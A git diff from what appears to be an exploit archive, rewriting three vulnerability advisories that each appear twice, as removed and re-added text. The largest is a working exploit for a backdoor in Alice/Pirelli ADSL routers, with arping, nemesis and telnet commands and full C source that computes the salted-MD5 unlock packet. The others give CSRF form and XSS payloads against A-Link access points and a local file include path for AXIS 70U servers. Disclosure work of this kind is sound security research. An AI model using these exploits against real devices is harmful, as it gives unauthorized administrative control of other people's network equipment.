to the routers -administration -interface and telnet/ftp/tftp services from internal network. - -Every user in the LAN (or Wireless LAN) can nevertheless have access -to the routers -administration interface and telnet/ftp/tftp! - -If an attacker can get access to the administrator interface and -login, he has full control -over the routers configuration. - -############################################################################################# - - -============== -3) The Exploit -============== - -To enable telnet/ftp/tftp and web-admin interface it is necessary send a special -IP packet to router specific ip 192.168.1.1. -This works only from internal LAN where an attacker have and ip like -192.168.1.XX. -The ip packet send to router must have the following feature: - -1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router) -2)Payload size 8 byte -3)The payload are the first 8 byte of a salted md5 of the mac address -of device br0 -4)br0 in these modems has the same mac of eth0 - -When the modem receives the packet all services will be enabled. - - -Example: - - ->From a GNU/LINUX distrib: - -1)Retrieve br0 maccaddress: - -arping -I eth0 -c 2 192.168.1.1 - -ARPING 192.168.1.1 from 192.168.1.2 eth0 -Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms -Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms -Sent 2 probes (1 broadcast(s)) -Received 2 response(s) - - -2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte -long file with the mac address. - run the application below and copy the output hash. - http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html - -3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file -(with the tool you like) - - i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex - - -4)Telnet to router : - - telnet 192.168.1.1 - - BCM96348 ADSL Router - Login: admin - Password: - - - -############################################################################################# - - -=========== -4) The Code -=========== - -/* Alice Backdoor Pwd creator by saxdax */ -/* this code generates an 8 byte hash to use as the paylod of the ip packet */ -/* the mac must be in an hex file and has to be passed as argument to -the program */ - -#include -#include -#include -#include "md5.h" - - -/* - * RFC 1321 compliant MD5 implementation - * - * Copyright (C) 2001-2003 Christophe Devine - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; either version 2 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * You should have received a copy of the GNU General Public License - * along with this program; if not, write to the Free Software - * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA - */ - - - -#define GET_UINT32(n,b,i) \ -{ \ - (n) = ( (uint32) (b)[(i) ] ) \ - | ( (uint32) (b)[(i) + 1] << 8 ) \ - | ( (uint32) (b)[(i) + 2] << 16 ) \ - | ( (uint32) (b)[(i) + 3] << 24 ); \ -} - -#define PUT_UINT32(n,b,i) \ -{ \ - (b)[(i) ] = (uint8) ( (n) ); \ - (b)[(i) + 1] = (uint8) ( (n) >> 8 ); \ - (b)[(i) + 2] = (uint8) ( (n) >> 16 ); \ - (b)[(i) + 3] = (uint8) ( (n) >> 24 ); \ -} - -void md5_starts( md5_context *ctx ) -{ - ctx->total[0] = 0; - ctx->total[1] = 0; - - ctx->state[0] = 0x67452301; - ctx->state[1] = 0xEFCDAB89; - ctx->state[2] = 0x98BADCFE; - ctx->state[3] = 0x10325476; -} - -void md5_process( md5_context *ctx, uint8 data[64] ) -{ - uint32 X[16], A, B, C, D; - - GET_UINT32( X[0], data, 0 ); - GET_UINT32( X[1], data, 4 ); - GET_UINT32( X[2], data, 8 ); - GET_UINT32( X[3], data, 12 ); - GET_UINT32( X[4], data, 16 ); - GET_UINT32( X[5], data, 20 ); - GET_UINT32( X[6], data, 24 ); - GET_UINT32( X[7], data, 28 ); - GET_UINT32( X[8], data, 32 ); - GET_UINT32( X[9], data, 36 ); - GET_UINT32( X[10], data, 40 ); - GET_UINT32( X[11], data, 44 ); - GET_UINT32( X[12], data, 48 ); - GET_UINT32( X[13], data, 52 ); - GET_UINT32( X[14], data, 56 ); - GET_UINT32( X[15], data, 60 ); - -#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n))) - -#define P(a,b,c,d,k,s,t) \ -{ \ - a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \ -} - - A = ctx->state[0]; - B = ctx->state[1]; - C = ctx->state[2]; - D = ctx->state[3]; - -#define F(x,y,z) (z ^ (x & (y ^ z))) - - P( A, B, C, D, 0, 7, 0xD76AA478 ); - P( D, A, B, C, 1, 12, 0xE8C7B756 ); - P( C, D, A, B, 2, 17, 0x242070DB ); - P( B, C, D, A, 3, 22, 0xC1BDCEEE ); - P( A, B, C, D, 4, 7, 0xF57C0FAF ); - P( D, A, B, C, 5, 12, 0x4787C62A ); - P( C, D, A, B, 6, 17, 0xA8304613 ); - P( B, C, D, A, 7, 22, 0xFD469501 ); - P( A, B, C, D, 8, 7, 0x698098D8 ); - P( D, A, B, C, 9, 12, 0x8B44F7AF ); - P( C, D, A, B, 10, 17, 0xFFFF5BB1 ); - P( B, C, D, A, 11, 22, 0x895CD7BE ); - P( A, B, C, D, 12, 7, 0x6B901122 ); - P( D, A, B, C, 13, 12, 0xFD987193 ); - P( C, D, A, B, 14, 17, 0xA679438E ); - P( B, C, D, A, 15, 22, 0x49B40821 ); - -#undef F - -#define F(x,y,z) (y ^ (z & (x ^ y))) - - P( A, B, C, D, 1, 5, 0xF61E2562 ); - P( D, A, B, C, 6, 9, 0xC040B340 ); - P( C, D, A, B, 11, 14, 0x265E5A51 ); - P( B, C, D, A, 0, 20, 0xE9B6C7AA ); - P( A, B, C, D, 5, 5, 0xD62F105D ); - P( D, A, B, C, 10, 9, 0x02441453 ); - P( C, D, A, B, 15, 14, 0xD8A1E681 ); - P( B, C, D, A, 4, 20, 0xE7D3FBC8 ); - P( A, B, C, D, 9, 5, 0x21E1CDE6 ); - P( D, A, B, C, 14, 9, 0xC33707D6 ); - P( C, D, A, B, 3, 14, 0xF4D50D87 ); - P( B, C, D, A, 8, 20, 0x455A14ED ); - P( A, B, C, D, 13, 5, 0xA9E3E905 ); - P( D, A, B, C, 2, 9, 0xFCEFA3F8 ); - P( C, D, A, B, 7, 14, 0x676F02D9 ); - P( B, C, D, A, 12, 20, 0x8D2A4C8A ); - -#undef F - -#define F(x,y,z) (x ^ y ^ z) - - P( A, B, C, D, 5, 4, 0xFFFA3942 ); - P( D, A, B, C, 8, 11, 0x8771F681 ); - P( C, D, A, B, 11, 16, 0x6D9D6122 ); - P( B, C, D, A, 14, 23, 0xFDE5380C ); - P( A, B, C, D, 1, 4, 0xA4BEEA44 ); - P( D, A, B, C, 4, 11, 0x4BDECFA9 ); - P( C, D, A, B, 7, 16, 0xF6BB4B60 ); - P( B, C, D, A, 10, 23, 0xBEBFBC70 ); - P( A, B, C, D, 13, 4, 0x289B7EC6 ); - P( D, A, B, C, 0, 11, 0xEAA127FA ); - P( C, D, A, B, 3, 16, 0xD4EF3085 ); - P( B, C, D, A, 6, 23, 0x04881D05 ); - P( A, B, C, D, 9, 4, 0xD9D4D039 ); - P( D, A, B, C, 12, 11, 0xE6DB99E5 ); - P( C, D, A, B, 15, 16, 0x1FA27CF8 ); - P( B, C, D, A, 2, 23, 0xC4AC5665 ); - -#undef F - -#define F(x,y,z) (y ^ (x | ~z)) - - P( A, B, C, D, 0, 6, 0xF4292244 ); - P( D, A, B, C, 7, 10, 0x432AFF97 ); - P( C, D, A, B, 14, 15, 0xAB9423A7 ); - P( B, C, D, A, 5, 21, 0xFC93A039 ); - P( A, B, C, D, 12, 6, 0x655B59C3 ); - P( D, A, B, C, 3, 10, 0x8F0CCC92 ); - P( C, D, A, B, 10, 15, 0xFFEFF47D ); - P( B, C, D, A, 1, 21, 0x85845DD1 ); - P( A, B, C, D, 8, 6, 0x6FA87E4F ); - P( D, A, B, C, 15, 10, 0xFE2CE6E0 ); - P( C, D, A, B, 6, 15, 0xA3014314 ); - P( B, C, D, A, 13, 21, 0x4E0811A1 ); - P( A, B, C, D, 4, 6, 0xF7537E82 ); - P( D, A, B, C, 11, 10, 0xBD3AF235 ); - P( C, D, A, B, 2, 15, 0x2AD7D2BB ); - P( B, C, D, A, 9, 21, 0xEB86D391 ); - -#undef F - - ctx->state[0] += A; - ctx->state[1] += B; - ctx->state[2] += C; - ctx->state[3] += D; -} - -void md5_update( md5_context *ctx, uint8 *input, uint32 length ) -{ - uint32 left, fill; - - if( ! length ) return; - - left = ctx->total[0] & 0x3F; - fill = 64 - left; - - ctx->total[0] += length; - ctx->total[0] &= 0xFFFFFFFF; - - if( ctx->total[0] < length ) - ctx->total[1]++; - - if( left && length >= fill ) - { - memcpy( (void *) (ctx->buffer + left), - (void *) input, fill ); - md5_process( ctx, ctx->buffer ); - length -= fill; - input += fill; - left = 0; - } - - while( length >= 64 ) - { - md5_process( ctx, input ); - length -= 64; - input += 64; - } - - if( length ) - { - memcpy( (void *) (ctx->buffer + left), - (void *) input, length ); - } -} - -static uint8 md5_padding[64] = -{ - 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 -}; - -void md5_finish( md5_context *ctx, uint8 digest[16] ) -{ - uint32 last, padn; - uint32 high, low; - uint8 msglen[8]; - - - high = ( ctx->total[0] >> 29 ) - | ( ctx->total[1] << 3 ); - low = ( ctx->total[0] << 3 ); - - PUT_UINT32( low, msglen, 0 ); - PUT_UINT32( high, msglen, 4 ); - - //for(int i=0;i<8;i++) printf("length %d\n",msglen[i]); - - last = ctx->total[0] & 0x3F; - padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last ); - - md5_update( ctx, md5_padding, padn ); - md5_update( ctx, msglen, 8 ); - - PUT_UINT32( ctx->state[0], digest, 0 ); - PUT_UINT32( ctx->state[1], digest, 4 ); - PUT_UINT32( ctx->state[2], digest, 8 ); - PUT_UINT32( ctx->state[3], digest, 12 ); -} - -//#ifdef TEST - - - -/* - * those are the standard RFC 1321 test vectors - */ - -static char *msg[] = -{ - "", - "a", - "abc", - "message digest", - "abcdefghijklmnopqrstuvwxyz", - "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", - "12345678901234567890123456789012345678901234567890123456789012" \ - "345678901234567890" -}; - -static char *val[] = -{ - "d41d8cd98f00b204e9800998ecf8427e", - "0cc175b9c0f1b6a831c399e269772661", - "900150983cd24fb0d6963f7d28e17f72", - "f96b697d7cb7938d525a2f31aaf161d0", - "c3fcd3d76192e4007dfb496cca67e13b", - "d174ab98d277d9f5a5611c2c9f419d9f", - "57edf4a22be3c955ac49da2e2107b67a" -}; - -static char saltOrig[] = -{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, -0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33}; - -int main( int argc, char *argv[] ) -{ - FILE *f; - int i, j; - char output[33]; - md5_context ctx; - unsigned char buf[1000]; - unsigned char md5sum[16]; - unsigned char salt[20]; - - printf( "****************************\n"); - printf( "Alice BackDoor hash creator \n"); - printf( "by saxdax and drPepperOne \n"); - printf( "****************************\n\n"); - - if( argc < 2 ) - { - printf( "\n Usage: %s pathfileMAC\n\n", argv[0] ); - return 0; - } - - if( ! ( f = fopen( argv[1], "rb" ) ) ) - { - perror( "fopen" ); - return( 1 ); - } - - md5_starts( &ctx ); - - while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 ) - { - md5_update( &ctx, buf, i ); - } - - memcpy(salt, saltOrig, 20); - - md5_update( &ctx, salt, 20 ); - - md5_finish( &ctx, md5sum ); - - printf("Payload is: "); - for( j = 0; j < 8; j++ ) - { - printf( "%02x", md5sum[j] ); - } - - return( 0 ); -} - - - - - - - -############################################################################################# - -====== -5) Fix -====== - - -Atcualy at 13 Oct 2008 NO FIX available. - -############################################################################################# - -# milw0rm.com [2008-10-14] +############################################################################################# + + saxdax & drpepperONE + + +Discovered embedded backdoor to activate telnet/ftp/tftp/web extended +admin interface with Admin privileges, from internal network lan on +Alice ADSL CPE +Modem/Router, manufactered by Pirelli based on Broadcom platform. + +############################################################################################# + + saxdax & drpepperONE + +Router Vendor: Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli + based on Broadcom platform. + +Model Affected: AGA[Alice Gate2 plus Wi-Fi]/AGB[Alice Gate2plus]AG2P-AG3[Alice Gate W2+] + /AGPV-AGPF[Alice Gate VoIP 2 Plus Wi-Fi] + +Firmware Version: All AGA/AGB/AG2P-AG3/AGPV-AGPF firmware version are affected. + +Platforms: Customized Linux version 2.6.8.1 on BroadcomBCM96348 chipset. + +Vulnerability: enable telnet/ftp/tftp and web-admin frominternal lan. + +Exploitation: internal network lan, versus Router + +Date: 13 Oct 2008 + +Authors: saxdax & drpepperONE + +e-mail: saxdax2@gmail.com drpepppperone@gmail.com + +Risk: medium>low + +############################################################################################# + +1) Introduction +2) Vulnerability +3) The Exploit +4) The Code +5) Fix + +############################################################################################# + +=============== +1) Introduction +=============== + +Telecom Italia is the most important Italian ISP offering an ADSL +service named "Alice". +Telecom Italia rent out with "Alice Adsl" service, different CPE +Modem/Router among which +the affected ones. +The interface to configure these modems are made extremily poor by the +provider to ensure +more control. +There's no way to enable telnet, ftp, tftp or more advanced web pages +from the web interface. + +http://www.telecomitalia.com/ +http://adsl.alice.it/ + +############################################################################################# + +================ +2) Vulnerability +================ + +An attacker can activate and get unauthorized access to the routers +administration +interface and telnet/ftp/tftp services from internal network. + +Every user in the LAN (or Wireless LAN) can nevertheless have access +to the routers +administration interface and telnet/ftp/tftp! + +If an attacker can get access to the administrator interface and +login, he has full control +over the routers configuration. + +############################################################################################# + + +============== +3) The Exploit +============== + +To enable telnet/ftp/tftp and web-admin interface it is necessary send a special +IP packet to router specific ip 192.168.1.1. +This works only from internal LAN where an attacker have and ip like +192.168.1.XX. +The ip packet send to router must have the following feature: + +1)IP-protocol-number 255 (there's a RAW SOCKET listening on the router) +2)Payload size 8 byte +3)The payload are the first 8 byte of a salted md5 of the mac address +of device br0 +4)br0 in these modems has the same mac of eth0 + +When the modem receives the packet all services will be enabled. + + +Example: + + +>From a GNU/LINUX distrib: + +1)Retrieve br0 maccaddress: + +arping -I eth0 -c 2 192.168.1.1 + +ARPING 192.168.1.1 from 192.168.1.2 eth0 +Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 8.419ms +Unicast reply from 192.168.1.1 [00:01:02:03:04:05] 2.095ms +Sent 2 probes (1 broadcast(s)) +Received 2 response(s) + + +2)Calculate special md5 hash from br0 macaddress: create an hex 6 byte +long file with the mac address. + run the application below and copy the output hash. + http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html + +3)Send ip packet to router ip 192.168.1.1 with 8 byte paylod file +(with the tool you like) + + i.e.: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex + + +4)Telnet to router : + + telnet 192.168.1.1 + + BCM96348 ADSL Router + Login: admin + Password: + + + +############################################################################################# + + +=========== +4) The Code +=========== + +/* Alice Backdoor Pwd creator by saxdax */ +/* this code generates an 8 byte hash to use as the paylod of the ip packet */ +/* the mac must be in an hex file and has to be passed as argument to +the program */ + +#include +#include +#include +#include "md5.h" + + +/* + * RFC 1321 compliant MD5 implementation + * + * Copyright (C) 2001-2003 Christophe Devine + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA + */ + + + +#define GET_UINT32(n,b,i) \ +{ \ + (n) = ( (uint32) (b)[(i) ] ) \ + | ( (uint32) (b)[(i) + 1] << 8 ) \ + | ( (uint32) (b)[(i) + 2] << 16 ) \ + | ( (uint32) (b)[(i) + 3] << 24 ); \ +} + +#define PUT_UINT32(n,b,i) \ +{ \ + (b)[(i) ] = (uint8) ( (n) ); \ + (b)[(i) + 1] = (uint8) ( (n) >> 8 ); \ + (b)[(i) + 2] = (uint8) ( (n) >> 16 ); \ + (b)[(i) + 3] = (uint8) ( (n) >> 24 ); \ +} + +void md5_starts( md5_context *ctx ) +{ + ctx->total[0] = 0; + ctx->total[1] = 0; + + ctx->state[0] = 0x67452301; + ctx->state[1] = 0xEFCDAB89; + ctx->state[2] = 0x98BADCFE; + ctx->state[3] = 0x10325476; +} + +void md5_process( md5_context *ctx, uint8 data[64] ) +{ + uint32 X[16], A, B, C, D; + + GET_UINT32( X[0], data, 0 ); + GET_UINT32( X[1], data, 4 ); + GET_UINT32( X[2], data, 8 ); + GET_UINT32( X[3], data, 12 ); + GET_UINT32( X[4], data, 16 ); + GET_UINT32( X[5], data, 20 ); + GET_UINT32( X[6], data, 24 ); + GET_UINT32( X[7], data, 28 ); + GET_UINT32( X[8], data, 32 ); + GET_UINT32( X[9], data, 36 ); + GET_UINT32( X[10], data, 40 ); + GET_UINT32( X[11], data, 44 ); + GET_UINT32( X[12], data, 48 ); + GET_UINT32( X[13], data, 52 ); + GET_UINT32( X[14], data, 56 ); + GET_UINT32( X[15], data, 60 ); + +#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n))) + +#define P(a,b,c,d,k,s,t) \ +{ \ + a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \ +} + + A = ctx->state[0]; + B = ctx->state[1]; + C = ctx->state[2]; + D = ctx->state[3]; + +#define F(x,y,z) (z ^ (x & (y ^ z))) + + P( A, B, C, D, 0, 7, 0xD76AA478 ); + P( D, A, B, C, 1, 12, 0xE8C7B756 ); + P( C, D, A, B, 2, 17, 0x242070DB ); + P( B, C, D, A, 3, 22, 0xC1BDCEEE ); + P( A, B, C, D, 4, 7, 0xF57C0FAF ); + P( D, A, B, C, 5, 12, 0x4787C62A ); + P( C, D, A, B, 6, 17, 0xA8304613 ); + P( B, C, D, A, 7, 22, 0xFD469501 ); + P( A, B, C, D, 8, 7, 0x698098D8 ); + P( D, A, B, C, 9, 12, 0x8B44F7AF ); + P( C, D, A, B, 10, 17, 0xFFFF5BB1 ); + P( B, C, D, A, 11, 22, 0x895CD7BE ); + P( A, B, C, D, 12, 7, 0x6B901122 ); + P( D, A, B, C, 13, 12, 0xFD987193 ); + P( C, D, A, B, 14, 17, 0xA679438E ); + P( B, C, D, A, 15, 22, 0x49B40821 ); + +#undef F + +#define F(x,y,z) (y ^ (z & (x ^ y))) + + P( A, B, C, D, 1, 5, 0xF61E2562 ); + P( D, A, B, C, 6, 9, 0xC040B340 ); + P( C, D, A, B, 11, 14, 0x265E5A51 ); + P( B, C, D, A, 0, 20, 0xE9B6C7AA ); + P( A, B, C, D, 5, 5, 0xD62F105D ); + P( D, A, B, C, 10, 9, 0x02441453 ); + P( C, D, A, B, 15, 14, 0xD8A1E681 ); + P( B, C, D, A, 4, 20, 0xE7D3FBC8 ); + P( A, B, C, D, 9, 5, 0x21E1CDE6 ); + P( D, A, B, C, 14, 9, 0xC33707D6 ); + P( C, D, A, B, 3, 14, 0xF4D50D87 ); + P( B, C, D, A, 8, 20, 0x455A14ED ); + P( A, B, C, D, 13, 5, 0xA9E3E905 ); + P( D, A, B, C, 2, 9, 0xFCEFA3F8 ); + P( C, D, A, B, 7, 14, 0x676F02D9 ); + P( B, C, D, A, 12, 20, 0x8D2A4C8A ); + +#undef F + +#define F(x,y,z) (x ^ y ^ z) + + P( A, B, C, D, 5, 4, 0xFFFA3942 ); + P( D, A, B, C, 8, 11, 0x8771F681 ); + P( C, D, A, B, 11, 16, 0x6D9D6122 ); + P( B, C, D, A, 14, 23, 0xFDE5380C ); + P( A, B, C, D, 1, 4, 0xA4BEEA44 ); + P( D, A, B, C, 4, 11, 0x4BDECFA9 ); + P( C, D, A, B, 7, 16, 0xF6BB4B60 ); + P( B, C, D, A, 10, 23, 0xBEBFBC70 ); + P( A, B, C, D, 13, 4, 0x289B7EC6 ); + P( D, A, B, C, 0, 11, 0xEAA127FA ); + P( C, D, A, B, 3, 16, 0xD4EF3085 ); + P( B, C, D, A, 6, 23, 0x04881D05 ); + P( A, B, C, D, 9, 4, 0xD9D4D039 ); + P( D, A, B, C, 12, 11, 0xE6DB99E5 ); + P( C, D, A, B, 15, 16, 0x1FA27CF8 ); + P( B, C, D, A, 2, 23, 0xC4AC5665 ); + +#undef F + +#define F(x,y,z) (y ^ (x | ~z)) + + P( A, B, C, D, 0, 6, 0xF4292244 ); + P( D, A, B, C, 7, 10, 0x432AFF97 ); + P( C, D, A, B, 14, 15, 0xAB9423A7 ); + P( B, C, D, A, 5, 21, 0xFC93A039 ); + P( A, B, C, D, 12, 6, 0x655B59C3 ); + P( D, A, B, C, 3, 10, 0x8F0CCC92 ); + P( C, D, A, B, 10, 15, 0xFFEFF47D ); + P( B, C, D, A, 1, 21, 0x85845DD1 ); + P( A, B, C, D, 8, 6, 0x6FA87E4F ); + P( D, A, B, C, 15, 10, 0xFE2CE6E0 ); + P( C, D, A, B, 6, 15, 0xA3014314 ); + P( B, C, D, A, 13, 21, 0x4E0811A1 ); + P( A, B, C, D, 4, 6, 0xF7537E82 ); + P( D, A, B, C, 11, 10, 0xBD3AF235 ); + P( C, D, A, B, 2, 15, 0x2AD7D2BB ); + P( B, C, D, A, 9, 21, 0xEB86D391 ); + +#undef F + + ctx->state[0] += A; + ctx->state[1] += B; + ctx->state[2] += C; + ctx->state[3] += D; +} + +void md5_update( md5_context *ctx, uint8 *input, uint32 length ) +{ + uint32 left, fill; + + if( ! length ) return; + + left = ctx->total[0] & 0x3F; + fill = 64 - left; + + ctx->total[0] += length; + ctx->total[0] &= 0xFFFFFFFF; + + if( ctx->total[0] < length ) + ctx->total[1]++; + + if( left && length >= fill ) + { + memcpy( (void *) (ctx->buffer + left), + (void *) input, fill ); + md5_process( ctx, ctx->buffer ); + length -= fill; + input += fill; + left = 0; + } + + while( length >= 64 ) + { + md5_process( ctx, input ); + length -= 64; + input += 64; + } + + if( length ) + { + memcpy( (void *) (ctx->buffer + left), + (void *) input, length ); + } +} + +static uint8 md5_padding[64] = +{ + 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 +}; + +void md5_finish( md5_context *ctx, uint8 digest[16] ) +{ + uint32 last, padn; + uint32 high, low; + uint8 msglen[8]; + + + high = ( ctx->total[0] >> 29 ) + | ( ctx->total[1] << 3 ); + low = ( ctx->total[0] << 3 ); + + PUT_UINT32( low, msglen, 0 ); + PUT_UINT32( high, msglen, 4 ); + + //for(int i=0;i<8;i++) printf("length %d\n",msglen[i]); + + last = ctx->total[0] & 0x3F; + padn = ( last < 56 ) ? ( 56 - last ) : ( 120 - last ); + + md5_update( ctx, md5_padding, padn ); + md5_update( ctx, msglen, 8 ); + + PUT_UINT32( ctx->state[0], digest, 0 ); + PUT_UINT32( ctx->state[1], digest, 4 ); + PUT_UINT32( ctx->state[2], digest, 8 ); + PUT_UINT32( ctx->state[3], digest, 12 ); +} + +//#ifdef TEST + + + +/* + * those are the standard RFC 1321 test vectors + */ + +static char *msg[] = +{ + "", + "a", + "abc", + "message digest", + "abcdefghijklmnopqrstuvwxyz", + "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789", + "12345678901234567890123456789012345678901234567890123456789012" \ + "345678901234567890" +}; + +static char *val[] = +{ + "d41d8cd98f00b204e9800998ecf8427e", + "0cc175b9c0f1b6a831c399e269772661", + "900150983cd24fb0d6963f7d28e17f72", + "f96b697d7cb7938d525a2f31aaf161d0", + "c3fcd3d76192e4007dfb496cca67e13b", + "d174ab98d277d9f5a5611c2c9f419d9f", + "57edf4a22be3c955ac49da2e2107b67a" +}; + +static char saltOrig[] = +{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, +0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33}; + +int main( int argc, char *argv[] ) +{ + FILE *f; + int i, j; + char output[33]; + md5_context ctx; + unsigned char buf[1000]; + unsigned char md5sum[16]; + unsigned char salt[20]; + + printf( "****************************\n"); + printf( "Alice BackDoor hash creator \n"); + printf( "by saxdax and drPepperOne \n"); + printf( "****************************\n\n"); + + if( argc < 2 ) + { + printf( "\n Usage: %s pathfileMAC\n\n", argv[0] ); + return 0; + } + + if( ! ( f = fopen( argv[1], "rb" ) ) ) + { + perror( "fopen" ); + return( 1 ); + } + + md5_starts( &ctx ); + + while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 ) + { + md5_update( &ctx, buf, i ); + } + + memcpy(salt, saltOrig, 20); + + md5_update( &ctx, salt, 20 ); + + md5_finish( &ctx, md5sum ); + + printf("Payload is: "); + for( j = 0; j < 8; j++ ) + { + printf( "%02x", md5sum[j] ); + } + + return( 0 ); +} + + + + + + + +############################################################################################# + +====== +5) Fix +====== + + +Atcualy at 13 Oct 2008 NO FIX available. + +############################################################################################# + +# milw0rm.com [2008-10-14] diff --git a/platforms/hardware/remote/6899.txt b/platforms/hardware/remote/6899.txt index e778d7f6e..ebc52b9b3 100755 --- a/platforms/hardware/remote/6899.txt +++ b/platforms/hardware/remote/6899.txt @@ -1,122 +1,122 @@ - Louhi Networks Information Security Research - Security Advisory - - - Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability - Release Date: 2008/10/31 -Last Modified: 2008/10/28 - Authors: Jussi Vuokko, CISSP [jussi.vuokko@louhi.fi] - Henri Lindberg [henri.lindberg@louhi.fi] - - Device: A-Link WL54AP3 and WL54AP2 (any firmware) - Severity: CSRF and XSS in management interface - Risk: Moderate -Vendor Status: Vendor has released an updated version - References: http://www.louhinetworks.fi/advisory/alink_081028.txt - - -Overview: - - Quote from http://www.a-link.com/ - "WLAN Access point 54MB, 4-port - Wlan Access point, wireless 54Mbps, DSSS, 802.11g-standard based and - it's compatible also with other manufacturers cards." - - During an audit of A-Link WLAN54AP3 it was discovered that a cross - site request forgery vulnerability exists in the management - interface. It is possible for an attacker to perform any - administrative actions in the management interface, if victim - can be lured or forced to view malicious content. These administrative - actions include e.g. changing admin user's username and password, - DNS settings etc. - - In addition, it was discovered that no input validation or output - encoding is performed in management interface, thus making it - vulnerable to cross-site scripting. - - By default admin password is blank and no authentication is performed - for requests to administrative interface. As ordinary consumers usually - use out-of-the-box settings, this vulnerability offers same kind of - phishing possibilities as used in Banamex attacks[1]. - - A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well. - - [1] http://www.google.fi/search?q=banamex+phishing+dns+poison - - -Details: - - A-Link WLAN54AP3 does not validate the origin of an HTTP request. If - attacker is able to make user view malicious content, the WLAN54AP3 - device can be controlled by submitting suitable forms. Attacker is - effectively acting as an administrator. - - Successful attack requires that the attacker knows the management - interface address for the target device (default IP address is - 192.168.1.254). As the management interface does not have logout - functionality, user can be vulnerable to this attack even after - closing a tab containing the management interface (if user does not - close the browser window or clear cookies and depending on browser - behaviour) or if default blank password is used. - - -Proof of Concept: - - CSRF: - - Example form (changes DNS servers, enables WAN web server access - and changes user's username and password): - - - - - - - - - - -
- - - - - - - - XSS: - - Add following content to management interface's Management - DDNS - - Domain Name: - - "">

+ +
+ + + + + + +
+ + + + + + + + XSS: + + Add following content to management interface's Management - DDNS - + Domain Name: + + "">

alert('DSecRG XSS') -http://[server]/user/help/general_help_user.shtml? - - - -Solution -******** - -Vendor decided that this vulnerability is not critical and there is no -patches for this firmware. But maybe he will patch issues on the next firmware release - - -Vendore response: - -[13.01.2009]: "We don't see any major vulnerability issues with the current firmware of Axis 70U but we will consider the mentioned issues on the next firmware release." - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. - -Contact: research [at] dsec [dot] ru - http://www.dsecrg.com - http://www.dsec.ru - -# milw0rm.com [2009-01-21] +Digital Security Research Group [DSecRG] Advisory #DSECRG-09-004 +AXIS 70U Network Document Server - Privilege Escalation and XSS + +http://dsecrg.com/pages/vul/show.php?id=60 + + +Application: AXIS 70U Network Document Server (Web Interface) +Versions Affected: 3.0 +Vendor URL: http://www.axis.com/ +Bug: Local File Include and Privilege Escalation, Multiple Linked XSS +Exploits: YES +Reported: 20.10.2008 +Vendor response: 20.10.2008 +Last response: 02.01.2009 +Vendor Case ID: 143027 +Solution: NONE +Date of Public Advisory: 19.01.2009 +Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +Vulnerabilities found in Web Interface of device AXIS 70U Network Document Server. + +1. Local File Include and Privilege Escalation. + +Standard user can escalate privileges to administrator. + +2. Multiple Linked XSS vulnerabilities + + + +Details +******* + +1. Local File Include and Privilege Escalation. + +Local File Include vulnerability found in script user/help/help.shtml + +User can unclude any local files even in admin folder. + +Example: + +http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml + + +2. Multiple Linked XSS 